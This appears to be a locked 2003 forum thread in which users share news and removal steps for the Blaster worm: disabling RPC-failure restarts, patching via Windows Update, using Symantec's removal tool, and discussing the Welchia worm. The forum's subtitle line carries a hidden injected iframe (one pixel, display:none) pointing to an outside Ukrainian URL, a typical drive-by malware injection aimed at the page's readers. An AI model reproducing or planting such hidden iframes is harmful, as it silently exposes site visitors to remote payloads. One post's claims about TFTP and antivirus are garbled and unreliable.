VIRUS ALERT!!!!

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Locked
R|X
Posts: 6
Joined: 2003-07-12 05:43

VIRUS ALERT!!!!

Post by R|X » 2003-08-12 11:53

:wink:

R|X
Posts: 6
Joined: 2003-07-12 05:43

Post by R|X » 2003-08-12 11:54

VIRUS ALERT!!!
Posted by 2eX Jubei @ 21:43 GMT, 11 Aug 2003 - iMsg*, Reply (Major News: HW)

--------------------------------------------------------------------------------

There was a worm set loose on the internet early yesterday evening called w32.blaster.worm. This basically causes ur computer to restart after 50 seconds with the following message:

'Windows must now restart because the remote procedure call (RPC) service terminated unexpectedly'

Some more information on the virus can be found here:

http://www.microsoft.com/security/secur ... 03-026.asp

http://securityresponse.symantec.com/av ... .worm.html

Take the following steps to get rid of this menace:

U can stop the computer restarting so that can deal with the problem by doing the following:

Click on start > run > type ‘services.msc’ > scroll down to the top remote procedure call (rpc) > right click on this and select properties > click on the recovery tab > change all 3 failure boxes to take no action instead of restart > click on apply and then ok > close services.msc.

Now that u can stay online, take urself off to:

http://windowsupdate.microsoft.com

Grab the security updates from microsoft to close off the ports that the worm uses on ur system.

Tool for removing the virus has been released by symantec here:

http://securityresponse.symantec.com/av ... .tool.html

Job done =]


*TAKEN FROM ESREALITY.COM*

R|X
Posts: 6
Joined: 2003-07-12 05:43

Post by R|X » 2003-08-12 11:55

My comp was infected by the virus ... luckily got it cleaned..!!!

Pll's comp that was infected won't even have a chance to read this forum.. so plsss inform your friends...!!!
This virus will make the comp to restart after some time ( about few minutes i think!! ) connecting to the net... ;O

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Post by jbyrd » 2003-08-12 12:47

The other links wouldn't work for me (includes "..."). Here are some fixed ones.
http://securityresponse.symantec.com/av ... .worm.html
http://securityresponse.symantec.com/av ... .tool.html
From symantec's description wrote:The worm contains the following text, which is never displayed:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
LOL. :lol: :lol:
Hehe.

tetsuokin
Posts: 50
Joined: 2003-06-09 06:55

Post by tetsuokin » 2003-08-12 14:41

https://grc.com/x/portprobe=135 to check to see if the port it attacks you on is open or closed... Mine is in stealth mode... but i've got a hardware firewall protecting it..

Trojan
Posts: 1
Joined: 2003-07-13 03:36

No fancy protection need...

Post by Trojan » 2003-08-12 16:39

.. just a simple SOFTWARE firewall will make you port stealth for the first thing. The later is that if you just update your windows this will not affect unless you consider the fact that the net will be downsized in capacity.

Laters report say that a new "transformation" is spreading which probably will make most anti virus software useless.. use firewall and caustion instead. The program handling it all is TFTP which is a common program in windows.. this makes in possible for the mask to get in a mess your system up.

R|X
Posts: 6
Joined: 2003-07-12 05:43

Post by R|X » 2003-08-12 18:14

jbyrd wrote:"From symantec's description"]The worm contains the following text, which is never displayed:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!

Waahahah..... :lol: its correct..!!

mai9
Posts: 111
Joined: 2003-04-16 23:02

Post by mai9 » 2003-08-12 21:41

I was told that people using win9x can't get that blaster. Maybe it's time to 'upgrade'? :twisted: :roll:

Twink
Posts: 436
Joined: 2003-03-31 23:31
Location: New Zealand

Post by Twink » 2003-08-12 22:19

mai9 wrote:I was told that people using win9x can't get that blaster. Maybe it's time to 'upgrade'? :twisted: :roll:
People on 9x have enuf troubles without needing an extra one, and the people with blaster obviously ignored all the security warning posts, which were going round for at least a week or two before blaster came out.

Xan1977
Forum Moderator
Posts: 627
Joined: 2003-06-05 20:15

Post by Xan1977 » 2003-08-13 10:08

Running tally of calls about this worm from faculty/staff at the University I work for: 15. And we've only been open for 2 hours, eesh.

Xan1977
Forum Moderator
Posts: 627
Joined: 2003-06-05 20:15

Post by Xan1977 » 2003-08-20 08:39

I actually wasn't sure which thread to put this under, the fallout one or this one, but oh well, whatever.

http://www.wired.com/news/infostructure ... 81,00.html "Are You a Good or a Bad Worm?"

http://securityresponse.symantec.com/av ... .worm.html
Symantec wrote:W32.Welchia.Worm does the following:

Attempts to download the DCOM RPC patch from Microsoft's Windows Update Web site, install it, and then reboot the computer.
Checks for active machines to infect by sending an ICMP echo request, or PING, which will result in increased ICMP traffic.
Attempts to remove W32.Blaster.Worm.
What a nice little worm... thank you Mr. Worm!

I don't know what to beleive anymore... :?

Locked